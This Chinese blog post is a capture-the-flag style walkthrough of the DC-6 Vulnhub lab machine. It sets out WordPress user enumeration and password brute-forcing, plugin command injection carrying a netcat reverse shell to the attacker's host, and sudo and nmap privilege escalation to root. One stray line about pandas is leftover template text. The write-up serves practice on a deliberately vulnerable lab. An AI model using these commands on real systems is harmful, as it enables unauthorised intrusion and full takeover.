DC-6靶机攻略

最新推荐文章于 2024-04-20 17:38:48 发布
最新推荐文章于 2024-04-20 17:38:48 发布
阅读量1.9k 收藏 20
点赞数 7
分类专栏: 漏洞复现 文章标签: 靶机 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47716438/article/details/119297050
版权

文章目录

前言

DC-1靶机攻略
DC-2靶机攻略
DC-4靶机攻略
本篇将介绍DC-6的靶机攻略

一、信息收集

1,确定IP以及开放端口

示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。

2,访问对方80端口

这里和DC-2很像,直接输入IP无法访问80,需要配置etc/hosts文件
在这里插入图片描述
配置后成功进入目标网站,发现是由WordPress搭建。直接上WPscan
在这里插入图片描述

WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能。
----------------------------------------------------------------------------------------------------------
WordPress是全球流行的博客网站,全球有上百万人使用它来搭建博客。他使用PHP脚本和Mysql数据库来搭建网站。

以往的DC靶机都有后台登陆,此次的也不例外
url为:http://wordy/wp-admin/

接下来我们开始扫描系统中的用户,用于爆破后台登陆密码。

命令:wpscan --url http://wordy/ -e u

扫描结果,我们将其存放在 /tmp/user.txt
在这里插入图片描述
用户名已经成功扫出,我们用kali自带的字典当做密码文件,这里要注意一个细节,就是在官网的说明中,dc-6的字典是可以被筛检的,可以大大减少我们爆破的时间。

命令:zcat /usr/share/wordlists/rockyou.txt.gz | grep k01 > /tmp/dc-6pass.txt

我们现在已经有了用户名文件和密码文件,接下来只需要进行wpscan爆破即可。

命令:wpscan --url http://wordy/ -U *(账号文件存放地址) -P *(密码文件存放地址)

找到有效的密码组合
在这里插入图片描述

3,登入对方后台

登陆后台后,在插件中,找到一个存在漏洞的插件Activity monitor
在这里插入图片描述
在这里插入图片描述
可以利用此处反弹shell。
在这里插入图片描述
我们接下来在kali的漏洞库里搜索此插件漏洞的使用方法。
在这里插入图片描述
用火狐查看,发现用法是可以在ip 后接其他命令,同样会在底层执行。例如
在这里插入图片描述
可以看到,在输出114的同时也把whoami的结果输出了。
我们可以利用nc和对方建立链接

kali端先输入代码:nc -lvp 1234

浏览器界面在输入:114.114.114.114 | nc 192.168.159.128 1234 -e /bin/bash

在这里插入图片描述
建立链接成功。

二、反弹shell与提权

1.得到SSH账号

输入命令:python -c "import pty;pty.spawn('/bin/bash')"
得到一个交互shell

得到交互后我们首先先去对方/etc/passwd下查看该系统的用户
在这里插入图片描述
我们在/home/mark的家目录找到文件,里面存着一个用户信息。猜测此用户为SSH登陆账号。

2.登陆对方SSH

成功登陆SSH
在这里插入图片描述
sudo -l 列出目前的权限
在这里插入图片描述
可以看到我们有一条语句是jens执行的,位置已说明。
我们进入到该目录,修改backup.sh
在这里插入图片描述
修改后我们用jens用户执行改文件。看一下jens用户有什么可执行命令

在这里插入图片描述
可以看到jens用户可以执行的命令。

3,切换用户并提权

使用nano命令,将原来的backups.sh脚本内容,修改为

/bin/sh 
echo 'os.execute("/bin/bash")' > root.nse

之后使用命令:sudo -u jens /home/jens/backups.sh,运行脚本,得到jens权限的shell
在这里插入图片描述
之后使用命令:sudo nmap -script=root.nse,用script执行后触发/bin/bash得到root权限,成功提权到root,并获得flag
在这里插入图片描述

辛徳橘子丶
关注
  • 7
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
DC-6靶机渗透测试详细教程
jennycisp的博客
12-14 1240
hosts定向wpscan枚举账号(因为是WordPress博客)wpscan账号密码爆破dirb目录扫描得到admin登录地址发现命令注入漏洞使用burp抓包修改数据反弹shell打开交互模式 python -c ‘import pty;进入到home目录查看DC-6的用户目录发现graham账号的密码,进行ssh登录成功使用sudo -l查看权限利用命令脚本转换到jens用户发现可执行root的文件为nmap创建一个nmap文件执行脚本只想nmap文件执行脚本获取到root。
DC靶机系列:DC-6
Ays.Ie的博客
02-28 561
本篇文章为DC系列第6个靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
Vulnhub靶机 DC-6 打靶实战 详细渗透测试过程
最新发布
rumil的博客
04-20 878
查看sudo -l 下的内容,发现有jens用户权限执行的脚本,正是刚才我们刚才看见的shell脚本,接下来可以利用此,来反弹jens用户权限的shell。当前目录下无可利用的文件信息,查看家目录,发现有四个用户信息,逐一查看,发现在jens家目录和mark家目录下有文件信息,逐一查看。mark家目录下有一个文件夹,文件夹当中为一个txt文本文件,查看后发现graham用户的信息,尝试ssh远程登录到graham。发现可以正常的命令回显,那么接下来直接进行反弹shell,kali端开启监听。
DC6靶场渗透流程(超详细)
m0_64583632的博客
04-10 906
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
看完这篇 教你玩转渗透测试靶机vulnhub——DC6
Aluxian_的博客
03-28 5281
Vulnhub靶机DC6渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解:③:漏洞发现:④:漏洞利用:⑤:提权:⑤:提权: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC6,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https
DC-6的靶机渗透
m0_74950307的博客
10-27 117
pty.spawn("/bin/bash")' 命令的用途是在某些情况下改进当前终端的功能和体验。将使用 Bash shell 来执行其中的命令,也就是该脚本进去了虚拟终端,我们可以使用虚拟终端来控制它。9.获得了password和user的密码集,那么就可以进行爆破,可以使用burp也可以使用wpscan。dc靶机的网站:http://wordy/以及登录界面:http://wordy/wp-admin/".sh" 是Shell脚本文件的常见文件扩展名,它指示该文件是使用Shell编程语言编写的脚本。
Neos的渗透测试靶机练习——DC-6
qq_38678845的博客
01-11 934
一次渗透测试练习
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
dc-4靶机练习.docx
01-02
靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
DC-6靶机渗透详细流程
braty_的博客
01-28 473
wpscan --url http://wordy -U users.list -P /usr/share/wordlists/rockyou.txt //kali自带的字典。接着我们向里面追加写入一个shell的命令,发现现在的用户权限不够,待会再说。提权后是盲敲,光标没变化,,算了,编辑好在粘贴去找flag。发现访问不了,,记起来有重定向,要添加 hosts。哦吼,意外之喜,,发现了5个用户名。先看看 SUID:没啥有用的信息。文件,那我们直接先 su 过去。看回显,,果然存在。
DC-6靶机详细渗透过程
MRS_jianai的博客
12-21 772
DC-6靶机详细渗透过程
Vulnhub-DC-6靶机实战(Nmap提权)
御七彩虹猫
05-19 1518
Vulnhub-DC-6靶机实战(Nmap提权)
DC-6 渗透测试
Darklord.W
04-14 1852
DC-6渗透测试 0x00实验环境 靶机DC-6,IP地址:192.168.8.141 测试机:Kali,IP地址:192.168.8.140; 0x01实验流程 信息收集——主机发现、端口扫描 渗透测试 0x02实验步骤 主机发现 端口及服务扫描 访问web端 考虑需要添加hosts记录 正常访问 Wpscan扫描站点 wpscan --url...
Dc-6靶机实验
weixin_52263461的博客
03-17 402
靶机DC-6下载地址: https://download.vulnhub.com/dc/DC-6.zip 环境:VMware 虚拟机软件 DC-6靶机IP地址:192.168.62.136 Kali的IP地址:192.168.62.135 使用nmap工具扫描192.168.62.0网段的存活主机,发现DC-6靶机的IP地址为192.168.62.136 使用nmap扫描靶机开放的端口,已开放端口有22(ssh)、80(http) 浏览器地址栏输入靶机IP地址,发现显示域名但无法
DC-6 步骤
底层社会中的弱智
09-21 337
目标IP 192.168.43.55 使用wpscan进行扫描 扫描的目标为用户和危险插件 过期插件 用户名 先对用户名进行爆破 来自作者的提醒 登陆 搜索已知的漏洞利用 下载利用 本地使用nc接收 提权 可以不使用密码执行backup.sh 可以直接获得jens的bash权限 在提权 nmap提权 TF=$(mktemp) echo 'os.execute("/bin/sh")' > $TF su
【Vulnhub靶机DC-6
qq_40863723的博客
02-15 2902
多喝热水:http://hackergu.com 主机发现 ​ 使用netdiscover命令,发现主机IP为192.168.203.132 端口探测 ​ 使用Nmap,nmap -sV -A 192.168.203.132 --script=vuln。 ​ 探测结果: root@kali:~# nmap -sV -A 192.168.203.132 --script=vuln Starti...
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

辛徳橘子丶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值